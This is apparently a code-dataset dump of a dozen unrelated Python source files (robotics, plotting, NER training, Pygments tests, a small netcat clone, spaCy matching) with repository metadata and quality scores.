max_stars_repo_path
stringlengths
4
197
max_stars_repo_name
stringlengths
6
120
max_stars_count
int64
0
191k
id
stringlengths
1
8
content
stringlengths
6
964k
score
float64
-0.88
3.95
int_score
int64
0
4
src/routines/base_routine.py
Impossibum/SARPBC
1
12758955
<reponame>Impossibum/SARPBC from rlbot.utils.structures.bot_input_struct import PlayerInput from rlbot.utils.structures.game_data_struct import GameTickPacket import utils.car as car_module import utils.game_data as game_data # Medium-long term task which may include maneuvers or even other routines! class BaseRoutine: def __init__(self, car: car_module.Car, gd: game_data.GameData) -> None: self.car = car self.finished = False self.controls = PlayerInput() self.maneuver = None self.routine = None self.gd = gd def update(self) -> PlayerInput: if self.maneuver and not self.maneuver.finished: return self.maneuver.update(self) elif self.routine and not self.routine.finished: return self.routine.update(self) else: return self.controls
1.875
2
python/plotserv/api_core.py
advancedplotting/aplot
10
12759083
<reponame>advancedplotting/aplot # Copyright (c) 2014-2015, Heliosphere Research LLC # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from this # software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from matplotlib import pyplot as plt from cStringIO import StringIO from PIL import Image import numpy as np import os.path as op import time from .terminals import remove_none from .core import resource from . import errors @resource('init') def init(ctx, a): """ No-op for Init.vi """ pass @resource('new') def new(ctx, a): """ Create a new figure, and initialize the axes. Returns a string integer with the new plot ID. """ import random PLOT_TYPES = {0: 'rect', 1: 'polar'} SCALES = {0: 'linear', 1: 'linear', 2: 'log', 3: 'symlog'} kind = a.enum('kind', PLOT_TYPES) xscale = a.enum('xscale', SCALES) yscale = a.enum('yscale', SCALES) bgcolor = a.color('bgcolor') axiscolor = a.color('axiscolor') left = a.float('left') right = a.float('right') top = a.float('top') bottom = a.float('bottom') aspect = a.float('aspect') # Check polar arguments for consistency if kind == 'polar' and xscale != 'linear': raise errors.LogNotSupported("Polar plots support only linear scales for X") # Right/top default margins are smaller as there are no labels left = left if left is not None else 0.12 bottom = bottom if bottom is not None else 0.12 right = right if right is not None else 0.10 top = top if top is not None else 0.10 width = (1.-left-right) height = (1.-bottom-top) # Catch reversed margins if width < 0: width = -1*width left = right if height < 0: height = -1*width bottom = top if aspect <= 0: aspect = None k = { 'axisbg': axiscolor, 'polar': kind == 'polar', 'aspect': aspect, } remove_none(k) plotid = random.randint(1,2**30) f = ctx.new(plotid) ctx.polar = (kind == 'polar') plt.axes((left, bottom, width, height), **k) if bgcolor is not None: f.set_facecolor(bgcolor) else: f.set_facecolor('w') # Manually setting the scale to linear screws up the default axis range if xscale != 'linear': plt.xscale(xscale)#, nonposx='clip') if yscale != 'linear': plt.yscale(yscale)#, nonposy='clip') ctx.xscale = xscale ctx.yscale = yscale return str(plotid) @resource('close') def close(ctx, a): """ Close a Plot ID, ignoring any error. """ plotid = a.plotid() try: ctx.set(plotid) ctx.close() except Exception: pass @resource('isvalid') def isvalid(ctx, a): """ Test if an identifier is known. Returns a string '1' if valid, '0' otherwise. """ plotid = a.plotid() return "%d" % (1 if ctx.isvalid(plotid) else 0) @resource('view') def view(ctx, a): """ Represents View.vi, optimized for rendering to a Picture.""" plotid = a.plotid() f = ctx.set(plotid) sio = StringIO() # Step 1: Save the figure to a raw RGBA buffer plt.savefig(sio, format='rgba', dpi=f.get_dpi(), facecolor=f.get_facecolor()) sio.seek(0) # Step 2: Import the image into PIL xsize, ysize = f.canvas.get_width_height() img = Image.fromstring("RGBA", (xsize, ysize), sio.read()) sio.close() # Step 3: Process the alpha channel out img.load() newimg = Image.new('RGB', img.size, (255, 255, 255)) newimg.paste(img, mask=img.split()[3]) # Step 4: Generate ARGB buffer (in little-endian format) r, g, b = tuple(np.fromstring(x.tostring(), dtype='u1') for x in newimg.split()) a = np.empty((xsize*ysize,4), dtype='u1') a[:,0] = b a[:,1] = g a[:,2] = r a[:,3] = 0 # Step 4: Return to LabVIEW, with size headers sio = StringIO() sio.write(np.array(ysize, 'u4').tostring()) sio.write(np.array(xsize, 'u4').tostring()) sio.write(a.tostring()) sio.seek(0) return sio.read() @resource('save') def save(ctx, a): """ Represents Save.vi. """ EXTENSIONS = { '.pdf': 'pdf', '.png': 'png', '.bmp': 'bmp', '.tif': 'tiff', '.tiff': 'tiff', '.jpg': 'jpeg', '.jpeg': 'jpeg', '.gif': 'gif', } plotid = a.plotid() name = a.string('path') f = ctx.set(plotid) root, ext = op.splitext(name) ext = ext.lower() if len(ext) == 0: raise errors.UnrecognizedFileExtension('No file extension: "%s"' % name) if ext not in EXTENSIONS: raise errors.UnrecognizedFileExtension('Unknown file extension: "%s"' % ext) format = EXTENSIONS[ext] vector_formats = ('pdf',) sio = StringIO() # PDF doesn't need further processing by PIL, # so we can short-circuit and return here. if format in vector_formats: plt.savefig(sio, format=format) sio.seek(0) return sio.read() # Step 1: Save the figure to a raw RGBA buffer plt.savefig(sio, format='rgba', dpi=f.get_dpi(), facecolor=f.get_facecolor()) sio.seek(0) # Step 2: Import the image into PIL xsize, ysize = f.canvas.get_width_height() img = Image.fromstring("RGBA", (xsize, ysize), sio.read()) # Step 3: Process the alpha channel out img.load() newimg = Image.new('RGB', img.size, (255, 255, 255)) newimg.paste(img, mask=img.split()[3]) img = newimg # Step 4: Export from PIL to the destination format sio = StringIO() img.save(sio, format=format) sio.seek(0) return sio.read()
1.773438
2
configs/mask_rcnn/mask_rcnn_se_x101_64x4d_fpn_mstrain_1x_coco.py
tianchiVideoSeg/mmdetection
1
12759211
<reponame>tianchiVideoSeg/mmdetection<gh_stars>1-10 _base_ = [ '../_base_/models/mask_rcnn_se_r50_fpn.py', '../_base_/datasets/coco_instance.py', '../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py' ] model = dict( pretrained='checkpoints/se_resnext101_64x4d-f9926f93.pth', backbone=dict(block='SEResNeXtBottleneck', layers=[3, 4, 23, 3], groups=64))
0.992188
1
util/utilities.py
umbertov/SpicyArbs
0
12759339
""" Utility functions go here. SpiceBucks """ # ------------------------------------------------------------------ import sys import numpy as np from util.message import message # ------------------------------------------------------------------ # ----------------------------------------------------------------------------------------- # system functions # ----------------------------------------z------------------------------------------------- def exit(code): """ Exit the program, 0 is failure, 1 is success. """ if not isinstance(code, int): message.logError("Exit code must be an interger.") exit(0) if code == 0: message.logError("Exiting program with failure status.") elif code == 1: message.logDebug("Exiting program with success status.") else: message.logError( "Exiting program with unknown error status (" + str(code) + ")" ) sys.exit()
1.710938
2
examples/futaba/futaba_burst_target_positions.py
karakuri-products/gs2d-python
7
12759467
<reponame>karakuri-products/gs2d-python #! /usr/bin/env python3 # encoding: utf-8 import sys import time import logging sys.path.insert(0, '../..') from gs2d import SerialInterface, Futaba # ログ設定 logging.basicConfig() logging.getLogger('gs2d').setLevel(level=logging.DEBUG) try: # 初期化 si = SerialInterface() futaba = Futaba(si) # バーストトルクON # enable: 1 sid_data = { 1: [1] } # Length: サーボ一つ分のデータ(VID+Data)のバイト数を指定。 # Length = VID(1) + Data(1) = 2 futaba.burst_write(Futaba.ADDR_TORQUE_ENABLE, 2, sid_data) # 色んな角度にバースト設定 for position_degree in [0, 50, 0, -50, 0]: # バーストポジション設定 sid_positions = { # サーボID: ポジション 1: position_degree } futaba.set_burst_target_positions(sid_positions) # 1秒待機 time.sleep(1.0) # クローズ futaba.close() si.close() except Exception as e: print('Error', e)
1.578125
2
abintb/qn.py
abyellow/abin-tight-binding
1
12759595
<reponame>abyellow/abin-tight-binding<gh_stars>1-10 import numpy as np from scipy.linalg import expm import matplotlib.pyplot as plt from time import time class QnModel: """ Initial data/conditions of Quantum Hamiltonian and initial states. """ def __init__(self, QnIni, tb_model=False): self.QnIni = QnIni self.k = QnIni.k self.ctrlt = QnIni.ctrlt #np.array(ctrlt) #initial control/laser self.H0 = QnIni.H0 #Hamiltonian with no control/laser self.Hctrl = QnIni.ham_t()#np.array(Hctrlt) #Hamiltonian of control/laser term self.phi_i = QnIni.phi_i() #initial quantum states self.dt = QnIni.dt #time step size self.tb_model = tb_model self.dim = np.shape(self.H0)[0] #dimension of Hamiltonian self.t_ini = 0. #start time self.tim_all = np.shape(self.Hctrl)[0] #time length of ctrl/laser self.real_tim = np.array(range(self.tim_all+1)) * self.dt +\ self.t_ini #real time of time length self.pau_i = np.array([[1,0],[0,1]]) def u_dt(self, H, tim): """propagator of dt time""" if self.tb_model: #cond = QnIni(k=self.k,ctrlt=self.ctrlt) dx,dy,dz = self.QnIni.dvec(self.ctrlt[tim]) d = np.sqrt(dx**2 + dy**2 + dz**2)*self.dt u = np.cos(d)*self.pau_i -1j*self.dt/d*np.sin(d)*H else: u = expm(-1j*H*self.dt) return u def u_t(self): """Evolve propergator for given time period""" dim = self.dim tim_all = self.tim_all #ctrl = self.ctrl H0 = self.H0 Hctrl = self.Hctrl u_all = np.zeros((tim_all+1,dim,dim),dtype = complex) u_all[0,:,:] = np.eye(dim) for tim in xrange(tim_all): H = H0 + Hctrl[tim]#np.matrix( ctrl[i,tim] * np.array(Hctrl[i])) u_all[tim+1,:,:] = np.dot(self.u_dt(H,tim), u_all[tim,:,:]) return u_all def phi_t(self): """Evolve state for given time period""" dim = self.dim tim_all = self.tim_all phi_all = np.zeros((tim_all+1,dim,1),dtype = complex) phi_all[0,:,:] = self.phi_i[:] u_all = self.u_t() for tim in xrange(tim_all): phi_all[tim+1,:,:] = np.dot(u_all[tim+1,:,:], phi_all[0,:,:]) return phi_all def prob_t(self,phi): """probability in time""" return np.real(phi*np.conjugate(phi)) class QnIni: def __init__(self, k, ctrlt, dt = .1, tau=1.,deltau=.5, ham_val=0,state='mix'): self.dt = dt self.k = k self.ctrlt = np.array(ctrlt) self.ham_val = ham_val self.tau = tau self.deltau = deltau self.state = state self.H0 = np.zeros((2,2)) self.save_name = 'save_name' def dvec(self,ctrl): k = self.k tau = self.tau deltau = self.deltau #+ ctrlt val = self.ham_val if val == 0: dx = tau+deltau + (tau-deltau) * np.cos(k-ctrl) dy = (tau-deltau) * np.sin(k-ctrl) dz = 0 elif val == 1: deltau = -deltau dx = tau+deltau + (tau-deltau) * np.cos(k-ctrl) dy = (tau-deltau) * np.sin(k-ctrl) dz = 0 elif val == 2: dx = 0.#self.tau/2. dy = 0.#(self.tau-deltau) * np.sin(k-A) dz = tau * np.cos(k-ctrl) elif val == 3: dx = self.tau/2. dy = 0.#(self.tau-deltau) * np.sin(k-A) #dz = (tau+ctrlt) * np.cos(k) dz = tau * np.cos(k-ctrl) elif val == 4: dx = tau+deltau + (tau-deltau) * np.cos(k[0]-ctrl) dy = (tau-deltau) * np.sin(k[1]-ctrl) dz = 0 return dx,dy,dz def ham(self,ctrl): pau_x = np.array([[0,1],[1,0]]) pau_y = np.array([[0,-1j],[1j,0]]) pau_z = np.array([[1,0],[0,-1]]) pau_i = np.array([[1,0],[0,1]]) dx,dy,dz = self.dvec(ctrl) return pau_x * dx + pau_y * dy + pau_z * dz def ham_t(self): ctrlt = self.ctrlt return np.array(map(self.ham,ctrlt)) def phi_i(self): state = self.state w,v = np.linalg.eigh(self.ham(ctrl=0)) if state == 'mix': return ((v[:,0]+v[:,1])/np.sqrt(2)).reshape(len(v[:,0]),1) elif state == 'down': return v[:,0].reshape(len(v[:,0]),1) elif state == 'up': return v[:,1].reshape(len(v[:,1]),1) else: print 'no such state!!' def eig_energy(self,ctrl=0): w, v = np.linalg.eigh(self.ham(ctrl)) return w if __name__ == "__main__": dt = .01 E0 = 1. knum = 100 freq = 1. tau = 1. deltau = .5#-.3 #phi_ini = [[1],[0]] n_tot = 4000 t_rel = (np.array(range(n_tot-1))-2000)*dt ctrli = E0 * np.cos(freq*t_rel) ki =[ 0.001 ,np.pi] #ki = 0.001 ti = time() cond1 = QnIni(k=ki, ctrlt=ctrli,ham_val = 4) #phi_i = cond1.phi_i() #Hctrl = cond1.ham_t() #print Hctrl.shape #H0 = np.zeros((2,2)) model1 = QnModel(cond1) phit = model1.phi_t() probt = model1.prob_t(phit) print 'run_time: ', time() - ti plt.plot(t_rel,probt[:-1,0,:]) plt.plot(t_rel,probt[:-1,1,:]) plt.show()
1.976563
2
spacewalk14.py
Benniah/Space-Exploration-NLP
0
12759723
#!/usr/bin/python """ DEBUGGING PATTERNS Both patterns in this exercise contain mistakes and won’t match as expected. Can you fix them? If you get stuck, try printing the tokens in the doc to see how the text will be split and adjust the pattern so that each dictionary represents one token. """ # Edit pattern1 so that it correctly matches all case-insensitive mentions # of "Amazon" plus a title-cased proper noun. # Edit pattern2 so that it correctly matches all case-insensitive mentions # of "ad-free", plus the following noun. import spacy from spacy.matcher import Matcher nlp = spacy.load("en_core_web_sm") doc = nlp( "Twitch Prime, the perks program for Amazon Prime members offering free " "loot, games and other benefits, is ditching one of its best features: " "ad-free viewing. According to an email sent out to Amazon Prime members " "today, ad-free viewing will no longer be included as a part of Twitch " "Prime for new members, beginning on September 14. However, members with " "existing annual subscriptions will be able to continue to enjoy ad-free " "viewing until their subscription comes up for renewal. Those with " "monthly subscriptions will have access to ad-free viewing until October 15." ) # Create the match patterns pattern1 = [{"LOWER": "amazon"}, {"IS_TITLE": True, "POS": "PROPN"}] pattern2 = [{"LOWER": "ad"}, {"TEXT": "-"}, {"LOWER": "free"}, {"POS": "NOUN"}] # Initialize the Matcher and add the patterns matcher = Matcher(nlp.vocab) matcher.add("PATTERN1", None, pattern1) matcher.add("PATTERN2", None, pattern2) # Iterate over the matches for match_id, start, end in matcher(doc): # Print pattern string name and text of matched span print(doc.vocab.strings[match_id], doc[start:end].text)
2.65625
3
tests/test_inherit.py
blu-base/pygments
1
12759851
<reponame>blu-base/pygments """ Tests for inheritance in RegexLexer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ :copyright: Copyright 2006-2022 by the Pygments team, see AUTHORS. :license: BSD, see LICENSE for details. """ from pygments.lexer import RegexLexer, inherit from pygments.token import Text class One(RegexLexer): tokens = { 'root': [ ('a', Text), ('b', Text), ], } class Two(One): tokens = { 'root': [ ('x', Text), inherit, ('y', Text), ], } class Three(Two): tokens = { 'root': [ ('i', Text), inherit, ('j', Text), ], } class Beginning(Two): tokens = { 'root': [ inherit, ('m', Text), ], } class End(Two): tokens = { 'root': [ ('m', Text), inherit, ], } class Empty(One): tokens = {} class Skipped(Empty): tokens = { 'root': [ ('x', Text), inherit, ('y', Text), ], } def test_single_inheritance_position(): t = Two() pats = [x[0].__self__.pattern for x in t._tokens['root']] assert ['x', 'a', 'b', 'y'] == pats def test_multi_inheritance_beginning(): t = Beginning() pats = [x[0].__self__.pattern for x in t._tokens['root']] assert ['x', 'a', 'b', 'y', 'm'] == pats def test_multi_inheritance_end(): t = End() pats = [x[0].__self__.pattern for x in t._tokens['root']] assert ['m', 'x', 'a', 'b', 'y'] == pats def test_multi_inheritance_position(): t = Three() pats = [x[0].__self__.pattern for x in t._tokens['root']] assert ['i', 'x', 'a', 'b', 'y', 'j'] == pats def test_single_inheritance_with_skip(): t = Skipped() pats = [x[0].__self__.pattern for x in t._tokens['root']] assert ['x', 'a', 'b', 'y'] == pats
1.820313
2
int.p4app/nc.py
baru64/int-p4
3
12759979
# simple netcat in python2 import sys import socket def netcat(host, port, is_server): if is_server: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host, port)) s.listen(1) conn, _ = s.accept() while True: data = conn.recv(1024) if not data: break print data conn.close() else: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) while True: data = raw_input() if not data: break s.sendall(data) s.close() if __name__ == "__main__": if len(sys.argv) < 4: print """usage\t\t nc.py TYPE HOST PORT TYPE - 'c' for client, 'l' for server""" else: if sys.argv[1] == 'c': netcat(sys.argv[2], int(sys.argv[3]), False) elif sys.argv[1] == 'l': netcat(sys.argv[2], int(sys.argv[3]), True) else: print "Bad option. Use 'l' or 'c'."
2.0625
2
src/agreement/predicate_mention.py
hitzkrieg/Okr-Test
0
12760107
<gh_stars>0 """ Author: <NAME> and <NAME> Receives two annotated graphs and computes the agreement on the predicate mentions. We average the accuracy of the two annotators, each computed while taking the other as a gold reference. """ import sys sys.path.append('../common') from mention_common import * from constants import NULL_VALUE from filter_propositions import filter_verbal, filter_non_verbal from collections import defaultdict def compute_predicate_mention_agreement(graph1, graph2): """ Compute predicate mention agreement on two graphs :param graph1: the first annotator's graph :param graph2: the second annotator's graph :return predicate mention accuracy and the consensual graphs """ # Get the consensual mentions and the mentions in each graph consensual_mentions, graph1_prop_mentions, graph2_prop_mentions = extract_consensual_mentions(graph1, graph2) # Compute the accuracy, each time taking one annotator as the gold accuracy1 = len(consensual_mentions) * 1.0 / len(graph1_prop_mentions) if len(graph1_prop_mentions) > 0 else 0.0 accuracy2 = len(consensual_mentions) * 1.0 / len(graph2_prop_mentions) if len(graph1_prop_mentions) > 0 else 0.0 prop_mention_acc = (accuracy1 + accuracy2) / 2 consensual_graph1 = filter_mentions(graph1, consensual_mentions) consensual_graph2 = filter_mentions(graph2, consensual_mentions) return prop_mention_acc, consensual_graph1, consensual_graph2 def compute_predicate_mention_agreement_verbal(graph1, graph2): """ Compute predicate mention agreement only on verbal predicates :param graph1: the first annotator's graph :param graph2: the second annotator's graph :return predicate mention accuracy on verbal predicates """ verbal_graph1 = filter_verbal(graph1) verbal_graph2 = filter_verbal(graph2) accuracy, _, _ = compute_predicate_mention_agreement(verbal_graph1, verbal_graph2) return accuracy def compute_predicate_mention_agreement_non_verbal(graph1, graph2): """ Compute predicate mention agreement only on non verbal predicates :param graph1: the first annotator's graph :param graph2: the second annotator's graph :return predicate mention accuracy on non verbal predicates """ non_verbal_graph1 = filter_non_verbal(graph1) non_verbal_graph2 = filter_non_verbal(graph2) accuracy, _, _ = compute_predicate_mention_agreement(non_verbal_graph1, non_verbal_graph2) return accuracy def filter_mentions(graph, consensual_mentions): """ Remove mentions that are not consensual :param graph: the original graph :param consensual_mentions: the mentions that both annotators agreed on :return: the graph, containing only the consensual mentions """ consensual_graph = graph.clone() for prop in consensual_graph.propositions.values(): prop.mentions = { id : mention for id, mention in prop.mentions.iteritems() if str(mention) in consensual_mentions} # Remove them also from the entailment graph if prop.entailment_graph != NULL_VALUE: prop.entailment_graph.mentions_graph = [(m1, m2) for (m1, m2) in prop.entailment_graph.mentions_graph if m1 in consensual_mentions and m2 in consensual_mentions] # Remove propositions with no mentions if len(prop.mentions) == 0: consensual_graph.propositions.pop(prop.id, None) return consensual_graph def extract_consensual_mentions(graph1, graph2): """ Receives two graphs, and returns the consensual predicate mentions, and the predicate mentions in each graph. :param graph1: the first annotator's graph :param graph2: the second annotator's graph :return the consensual predicate mentions, and the predicate mentions in each graph """ # Get the predicate mentions in both graphs graph1_prop_mentions = set.union(*[set(map(str, prop.mentions.values())) for prop in graph1.propositions.values()]) graph2_prop_mentions = set.union(*[set(map(str, prop.mentions.values())) for prop in graph2.propositions.values()]) # Exclude sentence that weren't annotated by both annotators common_sentences = set([x.split('[')[0] for x in graph1_prop_mentions]).intersection( set([x.split('[')[0] for x in graph2_prop_mentions])) graph1_prop_mentions = set([a for a in graph1_prop_mentions if a.split('[')[0] in common_sentences]) graph2_prop_mentions = set([a for a in graph2_prop_mentions if a.split('[')[0] in common_sentences]) # Exclude ignored words # TODO: Rachel - document ignored words if not graph2.ignored_indices == None: graph1_prop_mentions = set([a for a in graph1_prop_mentions if len(overlap_set(a, graph2.ignored_indices)) == 0]) if not graph1.ignored_indices == None: graph2_prop_mentions = set([a for a in graph2_prop_mentions if len(overlap_set(a, graph1.ignored_indices)) == 0]) # Compute the accuracy, each time treating a different annotator as the gold consensual_mentions = graph1_prop_mentions.intersection(graph2_prop_mentions) return consensual_mentions, graph1_prop_mentions, graph2_prop_mentions def argument_mention_to_terms(mention, sentence): """ Receives the argument mention and the sentence(list of tokens), and returns the string associated with the argument mention. :param mention: the Argument mention :param sentence: the list of tokens of string representing the sentence """ terms = ' '.join([sentence[int(id)] for id in str(mention).rstrip(']').split('[')[1].split(', ') ]) return terms def analyse_predicate_mentions_individually(graph1, graph2): """ Receives gold and pred graphs, and prints errors in predicate extraction. :param graph1: the gold graph :param graph2: the predicted graph :for now no returns """ # Extract the proposition mentions graph1_prop_mentions = set.union(*[set(map(str, prop.mentions.values())) for prop in graph1.propositions.values()]) graph2_prop_mentions = set.union(*[set(map(str, prop.mentions.values())) for prop in graph2.propositions.values()]) # List of the ids of Common sentences (as string) common_sentences = set([x.split('[')[0] for x in graph1_prop_mentions]).intersection(set([x.split('[')[0] for x in graph2_prop_mentions])) # classify mentions into categories consensual_mentions = graph1_prop_mentions.intersection(graph2_prop_mentions) predicted_mentions_but_not_in_gold = graph2_prop_mentions - graph1_prop_mentions gold_mentions_but_not_predicted = graph1_prop_mentions - graph2_prop_mentions # Predicates ignored in current evaluation scheme (because only common sentences are currently considered) ignored_gold_predicates = set([a for a in graph1_prop_mentions if a.split('[')[0] not in common_sentences]) ignored_pred_predicates = set([a for a in graph2_prop_mentions if a.split('[')[0] not in common_sentences]) # dict1 & dict2 (type dictionary) --> sentID: list of indices (each indices corresponds to a predicate mention) dict1 = defaultdict(list) dict2 = defaultdict(list) for a in gold_mentions_but_not_predicted: dict1[a.split('[')[0]].append(a.split('[')[1].rstrip(']').split(', ')) for a in predicted_mentions_but_not_in_gold: dict2[a.split('[')[0]].append(a.split('[')[1].rstrip(']').split(', ')) # matches: the number of examples where the predicted proposition is not there in gold, but shares some lexical overlap with the gold Propositions # match_pc: the precentage of overlap (in terms of number ofwords) # thresh: Minimum lexical overlap to record and print (may be used in further analysis) matches = 0 match_pc = 0.0 thresh = 0.0 for sentID in dict2.keys(): list1 = dict1[sentID] list2 = dict2[sentID] for j in list1: overlapped = False for i in list2: intersect = set(i).intersection(j) if len(intersect)!=0: matches+=1 lexical_overal_pc = len(intersect)/len(set(i).union(j)) if(lexical_overal_pc >= thresh): print(" \n------Example of Gold proposition which was missed by predicted (but there was some overlap) --------") sentence = graph1.sentences[int(sentID)] gold_prop_mention = graph1.prop_mentions_by_key[sentID+'['+', '.join(j)+']'] predicted_prop_mention = graph2.prop_mentions_by_key[sentID+'['+', '.join(i)+']'] print("Sentence: {}".format(' '.join(sentence))) print("Gold proposition: {}. Explicit: {}".format( ' '.join([sentence[int(index)] for index in j]) + '[' + ', '.join([argument_mention_to_terms(argument_mention, sentence) for argument_mention in gold_prop_mention.argument_mentions.values()]) + ']', gold_prop_mention.is_explicit ) ) # Arguments of predicted proposition not printed because info not available in code (from prop_ex) print("Predicted proposition: {}.".format( ' '.join([sentence[int(index)] for index in i] ) )) overlapped = True match_pc += lexical_overal_pc break if(overlapped==False): sentence = graph1.sentences[int(sentID)] gold_prop_mention = graph1.prop_mentions_by_key[sentID+'['+', '.join(j)+']'] print '\n-------Gold proposition which was completely missed (no overlap): ----------- ' print("Sentence: {}".format(' '.join(sentence))) print("Gold proposition: {}. Explicit: {}".format( ' '.join([sentence[int(index)] for index in j]) + '[' + ', '.join([argument_mention_to_terms(argument_mention, sentence) for argument_mention in gold_prop_mention.argument_mentions.values()]) + ']', gold_prop_mention.is_explicit ) ) if matches!=0: match_pc = match_pc/matches*100 print ('\nOther statistics:') print('No of consensual mentions: {}'.format(len(consensual_mentions))) print('No of predicted mentions not in gold: {}'.format(len(predicted_mentions_but_not_in_gold))) print('No of gold mentions but not in predicted: {}'.format(len(gold_mentions_but_not_predicted))) print('No of gold mentions which have been ignored from evaluation: {}'.format(len(ignored_gold_predicates))) print('No of predicted mentions which have been ignored from evaluation: {}'.format(len(ignored_pred_predicates))) print('No of predicted mentions which have some intersection with the unmatched gold predicates: {}'.format(matches)) print('*******************\n')
2.84375
3
Screen.py
ytyaru/Pygame.line.201707171836
0
12760235
<reponame>ytyaru/Pygame.line.201707171836 import pygame class Screen: def __init__(self, width=320, height=240, color=[0,0,0]): self.__color = color self.__size = (width, height) self.__screen = pygame.display.set_mode(self.__size) @property def Screen(self): return self.__screen @property def Size(self): return self.__size @property def Color(self): return self.__color def Fill(self): self.__screen.fill(self.__color)
2.0625
2
ner/train_utils.py
bestasoff/adynorm
1
12760363
<gh_stars>1-10 import logging import pickle from collections import defaultdict from tqdm import tqdm from .utils import clear_cuda_cache import torch import numpy as np from .ner import get_metrics logger = logging.getLogger(__name__) def train(model, optimizer, loader, accum_steps, device): model.train() losses_tr = [0] for i, batch in tqdm(enumerate(loader), total=len(loader)): input_ids = batch['input_ids'].to(device) attention_mask = batch['attention_mask'].to(device) labels = batch['labels'].to(device) outputs = model(input_ids, attention_mask=attention_mask, labels=labels) loss = outputs.loss / accum_steps losses_tr[-1] += loss.item() loss.backward() if (i + 1) % accum_steps == 0: optimizer.step() losses_tr.append(0) optimizer.zero_grad() clear_cuda_cache() return model, optimizer, np.mean(losses_tr) def val(model, loader, dataset, tokenizer, id2label, device): model.eval() losses_val = [] n = len(loader) with torch.no_grad(): for batch in tqdm(loader, total=n): input_ids = batch['input_ids'].to(device) attention_mask = batch['attention_mask'].to(device) labels = batch['labels'].to(device) outputs = model(input_ids, attention_mask=attention_mask, labels=labels) loss = outputs.loss losses_val.append(loss.item()) metrics = get_metrics(model, tokenizer, device, loader, dataset, id2label) return np.mean(losses_val), metrics def learning_loop( model, num_epochs, optimizer, scheduler, train_dataloader, val_dataloader, val_dataset, tokenizer, accum_steps, id2label, device, save_model_steps=10, save_losses: str = None, save_metrics: str = None): losses = {'train': [], 'val': []} val_metrics = {'precision': [], 'recall': [], 'f1': []} logger.info(f"*** Learning loop ***") for epoch in range(1, num_epochs + 1): clear_cuda_cache() logger.info(f"*** Train epoch #{epoch} started ***") model, optimizer, loss = train(model, optimizer, train_dataloader, accum_steps, device) losses['train'].append(loss) logger.info(f"*** Train epoch #{epoch} loss *** = {loss}") # if scheduler: # scheduler.step() if val_dataloader is not None: logger.info(f"*** Validation epoch #{epoch} started ***") loss, metrics = val(model, val_dataloader, val_dataset, tokenizer, id2label, device) for k, i in metrics.items(): val_metrics[k].append(i) losses['val'].append(loss) logger.info( f"*** Validation epoch #{epoch} results ***\nloss = {loss},\nprecision = {metrics['precision']},\nrecall = {metrics['recall']},\nf1 = {metrics['f1']}") if (epoch + 1) % save_model_steps == 0: torch.save(model.state_dict(), f'ner/trained_ner_models/model_{epoch}.ct') torch.save(optimizer.state_dict(), f'ner/trained_ner_models/optimizer_{epoch}.ct') if len(losses['train']) > 2 and abs(losses['train'][-1] - losses['train'][-2]) < 1e-5: break torch.save(model.state_dict(), f'ner/trained_ner_models/model_{num_epochs}.ct') torch.save(optimizer.state_dict(), f'ner/trained_ner_models/optimizer_{num_epochs}.ct') if save_losses is not None: with open(save_losses, 'wb') as file: pickle.dump(losses, file) if save_metrics is not None: with open(save_metrics, 'wb') as file: pickle.dump(val_metrics, file) return model, optimizer, losses
1.734375
2
scripts/make_users.py
vsoch/CogatPheno
0
12760491
from django.contrib.auth.models import User from userroles.models import set_user_role from userroles import roles # Read in some file with usersnames, emails, etc. username = "tmp" email = "<EMAIL>" password = "<PASSWORD>" user = User.objects.create_user(username, email, password) # At this point, user is a User object that has already been saved # to the database. You can continue to change its attributes # if you want to change other fields. # Now set user role set_user_role(user, roles.question_editor) # roles.question_editor # roles.assessment_editor # roles.behavior_editor
1.335938
1
Python/Skrypty/Python - Szkolenie_11-2015/przyklady_rec_python/PythonExample/descriptors2.py
Elzei/show-off
0
12760619
<reponame>Elzei/show-off<gh_stars>0 class MyClass(object): @property def x(self): return self.__x @x.getter def x(self): print "Pobranie atrybutu x" return self.__x @x.setter def x(self, value): print "Ustawienie x na", value self.__x = value @x.deleter def x(self): print "Usuniecie x" del self.__x a = MyClass() a.x = 999 w = a.x del a.x
2.3125
2
lib/modeling/contrasted_context_net.py
xixiobba/MVP-Net
18
12760747
